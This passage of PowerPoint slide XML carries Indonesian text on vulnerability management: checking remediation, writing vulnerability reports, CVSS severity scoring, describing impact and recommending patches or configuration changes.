              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilaksanakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mestinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelaporan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelaporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aspek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyoroti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keparahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Common Vulnerability Scoring System (CVSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keparahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVSS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemadaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekomendasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyarankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merekomendasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
